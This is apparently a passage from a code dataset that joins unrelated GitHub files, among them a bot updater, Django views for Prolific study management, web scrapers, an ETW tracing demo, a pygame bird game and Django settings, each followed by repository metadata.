delete.\n\n if clean or not webhook_url:\n self._network_loop_retry(bootstrap_del_webhook, bootstrap_onerr_cb,\n 'bootstrap del webhook', bootstrap_interval)\n retries[0] = 0\n # Clean pending messages, if requested.\n if clean:\n self._network_loop_retry(bootstrap_clean_updates, bootstrap_onerr_cb,\n 'bootstrap clean updates', bootstrap_interval)\n retries[0] = 0\n sleep(1)\n\n # Restore/set webhook settings, if needed. 
Again, we don't know ahead if a webhook is set,\n # so we set it anyhow.\n if webhook_url:\n self._network_loop_retry(bootstrap_set_webhook, bootstrap_onerr_cb,\n 'bootstrap set webhook', bootstrap_interval)\n\n @staticmethod\n def _increase_poll_interval(current_interval):\n # increase waiting times on subsequent errors up to 30secs\n if current_interval == 0:\n current_interval = 1\n elif current_interval < 30:\n current_interval += current_interval / 2\n elif current_interval > 30:\n current_interval = 30\n return current_interval\n\n def stop(self):\n \"\"\"Stops the polling/webhook thread, the dispatcher and the job queue.\"\"\"\n\n # self.job_queue.stop()\n with self.__lock:\n if self.running or self.dispatcher.has_running_threads:\n self.logger.debug('Stopping Updater and Dispatcher...')\n\n self.running = False\n\n # self._stop_httpd()\n self._stop_dispatcher()\n self._join_threads()\n\n # Stop the Session instance only if it was created by the Updater\n if self.session:\n self.session.close()\n\n def _stop_httpd(self):\n if self.httpd:\n self.logger.debug('Waiting for current webhook connection to be closed...')\n self.httpd.shutdown()\n self.httpd = None\n\n def _stop_dispatcher(self):\n self.logger.debug('Requesting Dispatcher to stop...')\n self.dispatcher.stop()\n\n def _join_threads(self):\n for thr in self.__threads:\n self.logger.debug('Waiting for {0} thread to end'.format(thr.name))\n thr.join()\n self.logger.debug(' thread {0} has been ended'.format(thr.name))\n self.__threads = []\n","repo_name":"mmdaz/Bot","sub_path":"python_bale_bot/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":14280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24423049199","text":"class Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n #nums=[i for i in nums if i !=val]\n j=0\n for i in nums:\n if i==val:\n continue\n else:\n nums[j]=i\n j+=1\n nums=nums[:j]\n return len(nums)\n\n\n ","repo_name":"abhiraj24/Leetcode","sub_path":"Arrays and Strings/remove-element/remove-element.py","file_name":"remove-element.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39627827841","text":"import json\nimport pprint\n\nfrom collections import defaultdict\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import F, Prefetch\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, FileResponse\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import DetailView, ListView, TemplateView, View\nfrom django.views.generic.edit import CreateView, FormView, UpdateView\n\nfrom experiments import views as exp_views\nfrom experiments import models as exp_models\n\nfrom prolific import models\nfrom prolific import forms\nfrom prolific import outgoing_api\n\nclass ProlificServe(exp_views.Serve):\n def set_subject(self):\n prolific_id = self.request.GET.get('PROLIFIC_PID', None)\n if prolific_id is None:\n self.subject = None\n else:\n self.subject = exp_models.Subject.objects.get_or_create(prolific_id=prolific_id)[0]\n\n '''\n def complete(self, request):\n return redirect(reverse('prolific:complete', 
kwargs={'assignment_id': self.assignment.id}))\n '''\n\nclass ProlificComplete(View):\n def get(self, request, *args, **kwargs):\n assignment = get_object_or_404(\n models.Assignment,\n id=self.kwargs.get('assignment_id')\n )\n cc_url = None\n try:\n cc = models.SimpleCC.objects.get(battery=assignment.battery)\n cc_url = cc.completion_url\n except ObjectDoesNotExist:\n pass\n\n return render(request, \"prolific/complete.html\", {'completion_url': cc_url})\n\nclass SimpleCCUpdate(LoginRequiredMixin, UpdateView):\n form_class = forms.SimpleCCForm\n template_name = 'prolific/simplecc_form.html'\n\n def get_success_url(self):\n pk = self.kwargs.get('battery_id')\n return reverse('experiments:battery-detail', kwargs={'pk': pk})\n\n def get_object(self, queryset=None):\n return models.SimpleCC.objects.get_or_create(battery_id=self.kwargs.get('battery_id'), defaults={'completion_url': ''})[0]\n\nclass StudyCollectionList(LoginRequiredMixin, ListView):\n model = models.StudyCollection\n queryset = models.StudyCollection.objects.prefetch_related(Prefetch('study_set', queryset=models.Study.objects.filter(remote_id__gt='').order_by('rank'))).all()\n\nclass StudyCollectionView(LoginRequiredMixin, TemplateView):\n template_name = \"prolific/study_collection.html\"\n collection = None\n collection_kwargs = {}\n\n def get_object(self):\n collection_id = self.kwargs.get(\"collection_id\")\n if collection_id is not None:\n self.collection = get_object_or_404(models.StudyCollection, pk=collection_id)\n self.collection_kwargs={'instance': self.collection}\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['collection_id'] = self.kwargs.get(\"collection_id\")\n\n if \"form\" not in kwargs:\n context[\"form\"] = forms.StudyCollectionForm(**self.collection_kwargs)\n else:\n context[\"form\"] = kwargs.get(\"form\")\n\n initial = []\n if self.collection:\n initial = list(\n models.Study.objects.filter(study_collection=self.collection)\n .values('battery', 'rank')\n )\n if \"study_rank_formset\" not in kwargs:\n context[\"study_rank_formset\"] = forms.BatteryRankFormset(initial=initial)\n else:\n context[\"study_rank_formset\"] = kwargs.get(\"studyrankformset\")\n\n context['batteries'] = exp_models.Battery.objects.exclude(status__in=['template', 'inactive']).values_list('id', 'title')\n\n return context\n\n def get(self, request, *args, **kwargs):\n self.get_object()\n return self.render_to_response(self.get_context_data())\n\n def post(self, request, *args, **kwargs):\n self.get_object()\n form = forms.StudyCollectionForm(self.request.POST, **self.collection_kwargs)\n form.instance.user = request.user\n collection = form.save()\n\n study_rank_formset = forms.BatteryRankFormset(\n self.request.POST\n )\n\n if study_rank_formset.is_valid():\n study_set = list(collection.study_set.all())\n for i, form in enumerate(study_rank_formset):\n batt = form.cleaned_data['battery']\n rank = form.cleaned_data['rank']\n if i < len(study_set):\n study_set[i].battery = batt\n study_set[i].rank = rank\n study_set[i].save()\n else:\n new_study = models.Study(battery=batt, rank=rank, study_collection=collection)\n new_study.save()\n [x.delete() for x in study_set[len(study_rank_formset):]]\n else:\n print(study_rank_formset.errors)\n return self.render_to_response(self.get_context_data(form=form, study_rank_formset=study_rank_formset))\n\n if form.is_valid():\n return HttpResponseRedirect(reverse_lazy(\"prolific:study-collection-update\", kwargs={'collection_id': collection.id}))\n 
\ndef fetch_studies_by_status(id=None):\n try:\n study_collection = models.StudyCollection.objects.get(id=id)\n response = outgoing_api.list_studies(study_collection.project)\n except (ObjectDoesNotExist, ValueError):\n response = outgoing_api.list_studies(id)\n studies_by_status = defaultdict(list)\n for study in response:\n studies_by_status[study['status']].append(study)\n studies_by_status.default_factory = None\n return studies_by_status\n\ndef fetch_remote_study_details(id=None):\n study = outgoing_api.study_detail(id)\n participants = []\n for filter in study.get('filters', []):\n if filter.get('filter_id') == 'participant_group_allowlist':\n for gid in filter.get('selected_values', []):\n response = outgoing_api.get_participants(gid)\n participants.extend(response.get('results', []))\n return {\"study\": study, \"participants\": participants }\n\n@login_required\ndef remote_studies_list(request, id=None):\n try:\n study_collection = models.StudyCollection.objects.get(id=id)\n except (ObjectDoesNotExist, ValueError):\n study_collection = None\n\n studies_by_status = defaultdict(list)\n try:\n studies_by_status = fetch_studies_by_status(id=id)\n except Exception as e:\n messages.error(request, e)\n context = {\"studies_by_status\": studies_by_status, \"study_collection\": study_collection, \"id\": id }\n return render(request, \"prolific/remote_studies_list.html\", context)\n\n@login_required\ndef remote_study_detail(request, id=None):\n context = {}\n try:\n context = fetch_remote_study_details(id=id)\n except Exception as e:\n messages.error(request, e)\n\n return render(request, \"prolific/remote_study_detail.html\", context)\n\n@login_required\ndef create_drafts_view(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, id=collection_id)\n responses = []\n try:\n responses = collection.create_drafts()\n except Exception as e:\n messages.error(request, e)\n return render(request, \"prolific/create_drafts_responses.html\", {'responses': responses, 'id': collection_id})\n\n@login_required\ndef publish_drafts(request, collection_id):\n studies = fetch_studies_by_status(collection_id)\n responses = []\n for study in studies.get('UNPUBLISHED', []):\n try:\n response = outgoing_api.publish(study['id'])\n responses.append(response)\n except Exception as e:\n messages.error(request, e)\n\n return render(request, \"prolific/create_drafts_responses.html\", {'responses': responses, 'id': collection_id})\n\n@login_required\ndef collection_progress(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, id=collection_id)\n subjects = exp_models.Subject.objects.filter(studycollectionsubject__study_collection=collection)\n studies = collection.study_set.all().order_by('rank')\n\n subject_groups = {}\n errors = []\n\n for subject in subjects:\n subject_groups[subject] = {}\n for study in studies:\n completed = exp_models.Assignment.objects.filter(status=\"completed\", subject=subject, battery=study.battery).count()\n subject_groups[subject][study.battery.id] = {'completed': completed}\n\n for study in studies:\n try:\n details = fetch_remote_study_details(id=study.remote_id)\n except Exception as e:\n errors.append(f'Error on {study.remote_id}: {e}')\n continue\n for participant in details['participants']:\n try:\n subject = subjects.get(prolific_id=participant['participant_id'])\n subject_groups[subject][study.battery.id]['date_added'] = 
participant['datetime_created']\n except ObjectDoesNotExist:\n subject_groups[subject][study.battery.id]['date_added'] = None\n\n context = {\n 'subject_groups': subject_groups,\n 'studies': studies,\n 'subjects': subjects,\n 'collection': collection,\n 'errors': errors\n }\n return render(request, \"prolific/collection_progress.html\", context)\n\n'''\n Should probably exist as a method of the form itself.\n given a list of prolific Ids and study collection:\n - create Subject instances for PIDs if they don't exist.\n - create assignments if subject was created?\n - StudyCollectionSubject, permanently links collection and pid.\n - What are we really doing with this model?\n - See what batteries subject has completed\n - find earliest incomplete in StudyCollection rank order.\n - via prolific api add them to partgroup/allowlist/etc...\n'''\nclass ParticipantFormView(LoginRequiredMixin, FormView):\n template_name = \"prolific/participant_form.html\"\n form_class = forms.ParticipantIdForm\n success_url = reverse_lazy('prolific:study-collection-list')\n\n def form_valid(self, form):\n ids = form.cleaned_data['ids']\n collection = get_object_or_404(models.StudyCollection, id=self.kwargs['collection_id'])\n\n subjects = []\n for id in ids:\n subject, created = exp_models.Subject.objects.get_or_create(prolific_id=id)\n subjects.append(subject)\n\n for subject in subjects:\n subject_collection, created = models.StudyCollectionSubject.objects.get_or_create(study_collection=collection, subject=subject)\n\n pids_to_add = defaultdict(list)\n studies = models.Study.objects.filter(study_collection=collection).order_by('rank')\n # Only works with study in inner for loop, we only want to add each subject at most once to an allowlist in this call.\n for subject in subjects:\n for study in studies:\n completed = exp_models.Assignment.objects.filter(status=\"completed\", subject=subject, battery=study.battery)\n if len(completed) == 0:\n pids_to_add[study.remote_id].append(subject.prolific_id)\n break\n\n for study in studies:\n study.add_to_allowlist(pids_to_add[study.remote_id])\n\n return super().form_valid(form)\n\n@login_required\ndef clear_remote_ids(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, pk=collection_id)\n collection.clear_remote_ids()\n return HttpResponseRedirect(reverse_lazy(\"prolific:study-collection-list\"))\n\n@login_required\ndef toggle_collection(request, collection_id):\n collection = get_object_or_404(models.StudyCollection, pk=collection_id)\n collection.active = not collection.active\n collection.save()\n return HttpResponseRedirect(reverse_lazy(\"prolific:study-collection-list\"))\n","repo_name":"expfactory/expfactory-deploy","sub_path":"expfactory_deploy/prolific/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22086361872","text":"# Solved in 6 lines excluding question\n# Divide an array in lengths of natural number sequence\n# like [1],[2,3],[4,5,6]\n# And find the maximum sum in all of the sequences\n\narr = [0, 1, 2, 3, 4, 5]\ni, pos, out = 1, 0, []\nwhile pos < (len(arr) - i + 1):\n out.append(arr[pos : pos + i])\n pos += i\n i += 1\nprint(max(sum(i) for i in 
out))","repo_name":"strenuousnerd8/Code","sub_path":"OptimalSequenceSum.py","file_name":"OptimalSequenceSum.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20939044771","text":"import time\n\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\nteams = ['atalanta', 'bologna-1', 'cremonese', 'empoli', 'fiorentina', 'verona', 'inter','juventus','lazio','lecce','milan',\n 'monza','napoli','roma','salernitana','sampdoria','sassuolo','spezia','torino','udinese']\n\ncognomi = []\naltezze = []\npesi = []\n\nfile_dati = open('dati_serieA.txt', 'w')\n\npath = 'C:\\\\Program Files\\\\ChromeDriver\\\\chromedriver.exe'\n\nfor team in teams:\n website = f'https://www.eurosport.it/calcio/squadre/{team}/teamcenter.shtml'\n\n # Crea Driver\n service = Service(path)\n driver = webdriver.Chrome(service=service)\n try:\n driver.get(website)\n except:\n print(f'ERRORE; {website} non raggiungibile')\n\n time.sleep(1)\n try:\n cookie_btn = driver.find_element(By.XPATH, '//div[@class=\"banner-actions-container\"]/button[@id=\"onetrust-accept-btn-handler\"]')\n cookie_btn.click()\n except:\n pass\n time.sleep(0.5)\n\n TAG_SQUADRA = '//span[@class=\"svg-icons svg-teamcompo\"]'\n squadra_btn = driver.find_element(By.XPATH, TAG_SQUADRA)\n squadra_btn.click()\n\n time.sleep(0.5)\n\n player_data = driver.find_elements(By.XPATH, '//ul[@class=\"teamcompo__list\"]/li/span')\n\n for player in player_data:\n altezza_giocatore = ''\n peso_giocatore = ''\n nome = ''\n # Se è pari allora sono le informazioni di altezza e peso\n if player_data.index(player) % 2 == 0:\n altezza_giocatore = player.find_element(By.XPATH, '//span[@class=\"player_infos\"][1]').text\n altezza_giocatore = altezza_giocatore.replace('m','')\n altezze.append(altezza_giocatore)\n\n peso_giocatore = player.find_element(By.XPATH, '//span[@class=\"player_infos\"][2]').text\n peso_giocatore = peso_giocatore.replace('kg', '')\n pesi.append(peso_giocatore)\n\n # Se è dispari informazione nome\n else:\n bandiera = player.find_element(By.XPATH,'//img[@class=\"flag\"]')\n # Se è italiano\n if bandiera.get_attribute('src') == 'src=\"https://i.eurosport.com/_iss_/geo/country/flag/small/2210.png\"':\n # Prendi nome\n nome = player.find_element(By.XPATH, '//a[@class=\"player_name\"]').text\n nome = nome.replace(' ',' ')\n cognomi.append(nome)\n else:\n pass\n\n print(team + ' ' + nome + ' '+ altezza_giocatore + ' '+ peso_giocatore)\n\n driver.close()\n\nfile_dati.write('\\n'.join(cognomi) + '\\n')\nfile_dati.write('\\n'.join(altezze) + '\\n')\nfile_dati.write('\\n'.join(pesi) + '\\n')","repo_name":"cricci3/Big_Data_es5","sub_path":"tas3_serieA.py","file_name":"tas3_serieA.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71122878886","text":"from scipy.stats import qmc\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt #\nimport os\nmpl.rcParams['savefig.format'] = \"png\"\n\ndef DesignPoint(column):\n #LogGamma, C [Linear, RBF, Sigmoid]\n sampler = qmc.LatinHypercube(d=2)\n sample = sampler.random(n=5)\n l_bounds = [0, 0]\n u_bounds = [2, 2]\n logans = qmc.scale(sample, l_bounds, u_bounds)\n ans = np.power(10, logans)\n\n figd, axd = plt.subplots(1,1,figsize=(5,5))\n plt.scatter(ans[:,0], ans[:, 1])\n plt.ylabel('C (Hyperparameter)')\n 
plt.xlabel('gamma (Hyperparameter)')\n plt.tight_layout()\n OutputFilename='DesignPoints_' + column +'.png'\n plt.savefig(OutputFilename)\n Command=\"open \" + \" \"+OutputFilename\n os.system(Command)\n\n return ans\n","repo_name":"amitkr2410/MachineLearning","sub_path":"SupportVectorMachine/LatinHyperCube/LatinHyperCubeSampling.py","file_name":"LatinHyperCubeSampling.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36563745681","text":"import setuptools\n\nREQUIREMENTS = [\n 'django-cms>=3.7',\n 'django-filer>=1.7',\n]\n\nsetuptools.setup(\n name=\"djangocms_svgimage\",\n version=\"1.0.11\",\n author=\"Pablo Pinargote\",\n author_email=\"pablo.pinargote@outlook.com\",\n description=\"Plugin for django CMS that allows you to add SVG images on your site.\",\n url='https://github.com/pablo-pinargote/djangocms_svgimage',\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ],\n install_requires=REQUIREMENTS,\n include_package_data=True,\n python_requires='>=3.6',\n)\n","repo_name":"pablo-pinargote/djangocms_svgimage","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34531711611","text":"\nimport torch as T\nfrom torch.autograd import Variable\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--unlabeled\",\n help=\"use unlabeled data\",\n action=\"store_true\")\nparser.add_argument(\"--modelname\",\n help=\"model name\",\n type=str)\nparser.add_argument(\"--loadmodel\",\n help=\"file to load model from for continuation\",\n type=str)\nparser.add_argument(\"--lambdas\",\n help=\"file to load lambdas from\",\n type=str)\nparser.add_argument(\"--cuda\",\n help=\"use cuda\",\n action=\"store_true\")\nparser.add_argument(\"--ensemble\",\n help=\"number of models\",\n type=int)\nparser.add_argument(\"--gamma\",\n help=\"gamma model\",\n action=\"store_true\")\n\nargs = parser.parse_args()\n\ndef variable(*args_, **kwargs):\n if args.cuda:\n return Variable(*args_, **kwargs).cuda()\n else:\n return Variable(*args_, **kwargs)\n\ndef var_to_numpy(v):\n if args.cuda:\n return v.cpu().data.numpy()\n else:\n return v.data.numpy()\n\ndef alloc_list(n):\n return [None] * n\n\ndef anynan(t):\n return ((t != t).sum() > 0) or ((t.abs() > 1e+7).sum() > 0)\n\ndef noise(size, scale=0.3, center=0):\n return variable(T.randn(*size)) * scale + center\n\ndef noised(x, scale=0.3, center=0):\n return x + variable(T.randn(*x.size())) * scale + center\n\ndef batchnorm_mean_var(x):\n ndim = x.dim()\n batch_size = x.size()[0]\n\n if ndim == 4:\n # Torch does not have mean/sum/variance over multiple axes...\n mean = x.mean(0).mean(2).mean(3)\n diff = x - mean.expand_as(x)\n var = (diff ** 2).mean(0).mean(2).mean(3)\n else:\n mean = x.mean(0)\n var = x.var(0) * (batch_size - 1) / batch_size\n\n return mean, var\n","repo_name":"raslann/Deep_learning","sub_path":"hw1/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18173738220","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\n\nclass List(db.Model):\n __tablename__ = 'lists'\n\n if environment == \"production\":\n __table_args__ = {'schema': SCHEMA}\n\n id = 
db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255), nullable=False)\n user_id = db.Column(db.Integer, db.ForeignKey(add_prefix_for_prod('users.id')))\n\n tasks = db.relationship(\n \"Task\",\n back_populates=\"list\",\n cascade=\"all, delete-orphan\"\n )\n user = db.relationship(\n \"User\",\n back_populates=\"lists\"\n )\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'user_id': self.user_id\n }\n","repo_name":"sarahmoore19/RememberThatFlask","sub_path":"app/models/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"18051547478","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import include, url\nfrom . import views\n\nurlpatterns = [\n\t# url(r'^$', views.main_page),\n url(r'^$', views.album_list),\n url(r'^album/(?P[0-9]+)/$', views.album_detail),\n url(r'^stats/', views.stats),\n]","repo_name":"artekw/winyle-app","sub_path":"vinyl/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27433710650","text":"from bs4 import BeautifulSoup\nimport requests\nfrom fake_headers import Headers\nimport re\nimport json\n\n\ndef readPageToHtml(url):\n fakeHeaders = Headers(browser='chrome', os='win')\n return requests.get(url, headers=fakeHeaders.generate()).text\n\ndef searchIn(html, searchTag, searchFeatures:dict, findAll = False):\n soup = BeautifulSoup(html, 'lxml')\n if findAll:\n return soup.findAll(searchTag, searchFeatures)\n else:\n return soup.find(searchTag, searchFeatures)\n \ndef descriptionContains(url, regex) -> bool:\n descPageHtml = readPageToHtml(url)\n desc = searchIn(descPageHtml, 'div', {'data-qa':'vacancy-description'})\n return re.search(regex, str(desc)) != None\n \ndef toDict(vacancyInfo) -> dict:\n title = searchIn(str(vacancyInfo), 'a', {'data-qa':'serp-item__title'}).text\n link = searchIn(str(vacancyInfo), 'a', {'data-qa':'serp-item__title'})['href']\n try:\n salary = searchIn(str(vacancyInfo), 'span', {'data-qa':'vacancy-serp__vacancy-compensation'}).text\n except:\n salary = 'з/п не указана'\n employer = searchIn(str(vacancyInfo), 'a', {'data-qa':'vacancy-serp__vacancy-employer'}).text\n city = searchIn(str(vacancyInfo), 'div', {'data-qa':'vacancy-serp__vacancy-address'}).text\n\n return {'title':str(title), 'link':str(link), 'salary':str(salary), 'employer':str(employer), 'city':str(city)}\n\ndef writeToJson(data:list|dict):\n with open('vacancies.json', 'w', encoding='utf8') as file:\n json.dump(data, file, indent=4, ensure_ascii=False)","repo_name":"PVLKorobov/HW-Scrapping","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40145900142","text":"import pprint\nimport threading\nimport time\n\nimport etw\n\n\ndef thread_func(trace):\n trace.start()\n print(\"ThreadEND\")\n\n\ndef prov_callback(event_name: str, event_id: int, provider_name: str, properties: dict) -> None:\n print(event_name, event_id, provider_name)\n pprint.pprint(properties)\n return None\n\n\ndef main():\n print(\"pyETW\")\n print(dir(etw))\n trace = etw.UserTrace(\"PyTrace\")\n\n usb_prov = etw.Provider(\"{ac52ad17-cc01-4f85-8df5-4dce4333c99b}\", callback=prov_callback)\n\n trace.enable(usb_prov)\n\n t = 
threading.Thread(target=thread_func, args=(trace,))\n t.start()\n\n try:\n print(\"Sleep 30 sec\")\n time.sleep(30)\n except:\n print(\"Interrupted!\")\n finally:\n print(\"Stop Trace\")\n trace.stop()\n print(\"Join Thread\")\n t.join()\n print(\"OK\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jbgalet/pyetw","sub_path":"demo/demo_usb.py","file_name":"demo_usb.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31096812951","text":"import math\nimport sys\n\nn = int(input())\nlength = n\nm = 0\ntemp = 1\n\nwhile(n>=0):\n n-=2\n length-=1\n m+=1\n temp+=(math.comb(length,m)*(2**m)) \n\nprint(temp%10007)","repo_name":"ssum21/BEAKJOON","sub_path":"11727.py","file_name":"11727.py","file_ext":"py","file_size_in_byte":174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43151835260","text":"import pygame\nimport pygame.mixer\nimport pygame.font\nfrom pygame.locals import *\nimport math\nimport itertools\nimport sys\nimport thread\nimport random\nfrom time import sleep\n\npygame.init()\n\nfullscreen = False\n\nspeed = 0.15\ninterval = 400.0\n\nbord_graphic = pygame.image.load('bord.png')\npipe_graphic = pygame.image.load('pipes.png')\npipe_graphic.set_colorkey((255,0,255))\n\nscreen = pygame.display.set_mode((1280,720), fullscreen)\nclock = pygame.time.Clock()\n\nclass Bord(object):\n\t\n\tdef __init__(self):\n\t\tself.y = 200\n\t\tself.vy = -1.0\n\t\n\tdef flap(self):\n\t\tself.vy = -4.0\n\t\n\tdef pump(self, dt):\n\t\tself.vy += 0.01 * dt\n\t\tself.y += self.vy\n\nclass Obstacles(object):\n\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.pipes = [360]\n\t\tself.since_pipe = 0\n\t\n\tdef pump(self, dt):\n\t\tself.x += speed * dt\n\t\tself.since_pipe += speed * dt\n\t\t\n\t\tif self.since_pipe >= interval:\n\t\t\t\n\t\t\tself.pipes.append(random.randint(100,600))\n\t\t\tself.since_pipe -= interval\n\t\t\nclass Engine(object):\n\tdef __init__(self):\n\t\tself.dt = 0\n\t\tself.t1 = pygame.time.get_ticks()\n\t\tself.t2 = 0\n\t\t\n\tdef MainLoop(self):\n\t\t\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT: exit()\n\t\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\t\texit()\n\t\t\t\telse:\n\t\t\t\t\tbord.flap()\n\t\t\n\t\tself.t2 = pygame.time.get_ticks()\n\t\tself.dt = self.t2 - self.t1\n\t\tself.t1 = self.t2\n\t\t\n\t\tbord.pump(self.dt)\n\t\tobstacles.pump(self.dt)\n\t\t\n\t\tself.DrawGraphics()\n\t\t\n\t\tclock.tick(120)\n\t\t\n\t\tpygame.display.update()\n\n\tdef DrawGraphics(self):\n\t\t\n\t\tscreen.fill((0,0,0))\n\t\t\n\t\tbord_rendered = pygame.transform.rotozoom(bord_graphic, -bord.vy*20, 1)\n\t\tscreen.blit(bord_rendered, (interval - (bord_rendered.get_width() / 2) , bord.y - (bord_rendered.get_height() / 2)))\n\t\t\n\t\tif len(obstacles.pipes) <= 4:\n\t\t\tfor p in range( 0, len(obstacles.pipes) - 1 ):\n\t\t\t\tscreen.blit(pipe_graphic, (1280 + interval - obstacles.x + interval*p, obstacles.pipes[p] - 720) )\n\t\telse:\n\t\t\tfor p in range( len(obstacles.pipes) - 5 , len(obstacles.pipes) - 1 ):\n\t\t\t\tscreen.blit(pipe_graphic, (1280 + interval - obstacles.x + interval*p , obstacles.pipes[p] - 720) )\n\t\t\t\n\ndt = 0\nt1 = pygame.time.get_ticks()\nt2 = 0\n\nobstacles = Obstacles()\nbord = Bord()\nengine = Engine()\n\nwhile 
1:\n\tengine.MainLoop()","repo_name":"Nitwon/floppy_bord","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20885868672","text":"\"\"\"\nDjango settings for tripnsale project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'ug0dk251ba6te45^%0qjyna$47kh^6o@!0_5%*@7zel4^6uhv2'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n)\n\nALLOWED_HOSTS = [\"tripnsale.com\", \"127.0.0.1\"]\n\nCURRENT_HOST = \"tripnsale.com\"\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'bootstrap3',\n 'offer',\n 'user',\n 'util',\n 'place',\n 'gallery',\n 'guarant',\n 'infos',\n 'valute',\n 'mail',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'tripnsale.urls'\n\nWSGI_APPLICATION = 'tripnsale.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'tripnsale.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'ru-ru'\n\nTIME_ZONE = 'Europe/Moscow'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = False\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n \"static\",\n)\n\n\nSTATIC_ROOT = \"/var/www/tripnsale/static/\"\n\nTEMPLATE_DIRS = (\n \"templates\",\n)\n\n\nMEDIA_ROOT = \"/var/www/tripnsale/upl/\"\n\nMEDIA_URL = 